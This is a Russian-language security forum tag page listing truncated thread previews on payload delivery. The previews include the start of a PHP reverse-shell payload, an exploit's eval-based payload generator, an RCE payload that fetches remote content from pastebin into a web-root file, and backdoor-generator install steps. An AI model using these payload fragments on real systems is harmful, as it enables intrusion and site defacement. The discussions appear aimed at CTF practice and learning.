• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

payload delivery

  1. M

    Проблема jpg +payload php

    Прохожу интересный CTF и там возможность подгрузить только jpg, проверка на jpg судя по всему идет на сервере, т.к. попытки подмены понятий через burp не проходят. Создал через FatRat стандартную php нагрузку /*<?php /**/ error_reporting(0); $ip = '192.168.168.168'; $port = 6969; if (($f =...
  2. GhostPants

    Статья Доставляем пейлоад через картинку

    Привет привет codeby, сегодня я расскажу вам про то как спрятать payload в картинке. Меня кстати Ghost Pants зовут. Данная статья является переводом с изменением данной статьи Peerlyst Приступаем: Это картинка, обычная совсем не подозрительная картинка. А если приблизить? Мы видим наш...
  3. GhostPants

    Статья Передаём пейлоад по wi-fi

    Привет любимый codeby, с вами Ghost Pants и сегодня мы поговорим о загрузке пейлоада через wi-fi. Данная статья является переводом с внесением корректив вот этой статьи Peerlyst. Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения...
  4. kamaz

    payload

    Привет народ!! это часть эксплойта ,где пайлд! подскаите чем сгенерировать мне свой пайлод? и как правильно все указать? def generate(payload): php_payload = "eval({0})".format(toCharCode(payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template =...
  5. kamaz

    payload

    Привет возник такой в эксплойтах типа RCE используют пайлоды , вот пример создания страницы пхп с Hacked by pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.php','w+'),file_get_contents('http://pastebin.com/raw/pYetDreV'))...
  6. Vander

    ZeroDoor - Генератор полезных нагрузок

    Привет, предлагаю обратить ваше внимание, на очередной, достаточно свежий инструмент, для создания полезных нагрузок, и дальнейшей эксплуатации ее, в качестве Remote Administration Tool. Zero Door Backdoor Generator. Установка: > git clone https://github.com/Souhardya/Zerodoor > cd...
  7. <~DarkNode~>

    Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

    Часть 4 Предыдущая часть Следующая часть Все части Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я...
Вверх Снизу